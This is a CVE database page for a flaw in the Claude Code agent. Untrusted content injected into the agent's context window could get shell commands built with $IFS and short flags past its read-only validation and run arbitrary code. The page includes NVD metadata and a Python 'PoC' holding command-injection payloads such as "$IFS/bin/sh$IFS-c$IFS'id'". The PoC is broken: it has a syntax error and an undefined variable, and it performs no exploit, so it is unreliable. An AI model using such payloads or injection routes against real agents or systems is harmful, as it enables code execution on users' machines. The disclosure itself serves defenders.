CVE-2025-66032

Description

Claude Code is an agentic coding tool. Prior to 1.0.93, Due to errors in parsing shell commands related to $IFS and short CLI flags, it was possible to bypass the Claude Code read-only validation and trigger arbitrary code execution. Reliably exploiting this requires the ability to add untrusted content into a Claude Code context window. This vulnerability is fixed in 1.0.93.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:anthropic:claude_code:*:*:*:*:*:node.js:*:* - VULNERABLE

Claude Code < 1.0.93

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-66032 PoC - Claude Code RCE via IFS/CLI flag bypass
# This PoC demonstrates the vulnerability concept
# Note: Requires ability to inject content into Claude Code context

import subprocess
import sys

def demonstrate_vulnerability():
    """
    Demonstrates the IFS and CLI flag parsing bypass technique.
    This is a conceptual PoC - actual exploitation requires Claude Code context.
    """
    
    # Example attack vectors that bypass read-only validation:
    # 1. Using $IFS to inject commands
    payload_ifi = "echo test; whoami #"
    
    # 2. Short CLI flag manipulation
    payload_cli = "-c 'echo vulnerable'"
    
    # 3. Combined exploitation
    combined_payload = "$IFS/bin/sh$IFS-c$IFS'id'"|
    
    print("[*] CVE-2025-66032 - Claude Code RCE PoC")
    print(f"[*] Payload type: IFS bypass")
    print(f"[*] Demonstrating: {payload_ifs}")
    
    # In actual exploitation:
    # 1. Attacker injects malicious content into Claude Code context
    # 2. Claude Code's parser misinterprets $IFS as safe
    # 3. Shell interprets special characters, executing arbitrary commands
    # 4. Bypasses read-only validation by exploiting parsing discrepancy
    
    return True

if __name__ == "__main__":
    demonstrate_vulnerability()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66032
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66032
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66032/
[4] VulDB https://vuldb.com/cve/CVE-2025-66032
[5] https://github.com/anthropics/claude-code/security/advisories/GHSA-xq4m-mc3c-vvg3

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66032", "sourceIdentifier": "[email protected]", "published": "2025-12-03T19:15:57.527", "lastModified": "2025-12-05T16:29:42.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Claude Code is an agentic coding tool. Prior to 1.0.93, Due to errors in parsing shell commands related to $IFS and short CLI flags, it was possible to bypass the Claude Code read-only validation and trigger arbitrary code execution. Reliably exploiting this requires the ability to add untrusted content into a Claude Code context window. This vulnerability is fixed in 1.0.93."}, {"lang": "es", "value": "Claude Code es una herramienta de codificación agéntica. Versiones anteriores a la 1.0.93, debido a errores en el análisis de comandos de shell relacionados con $IFS y flags CLI cortos, era posible eludir la validación de solo lectura de Claude Code y desencadenar la ejecución de código arbitrario. Explotar esto de forma fiable requiere la capacidad de añadir contenido no confiable en una ventana de contexto de Claude Code. Esta vulnerabilidad está corregida en la 1.0.93."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anthropic:claude_code:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "1.0.93", "matchCriteriaId": "E73D014A-196B-4DDC-AE9D-56279B7BD89A"}]}]}], "references": [{"url": "https://github.com/anthropics/claude-code/security/advisories/GHSA-xq4m-mc3c-vvg3", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}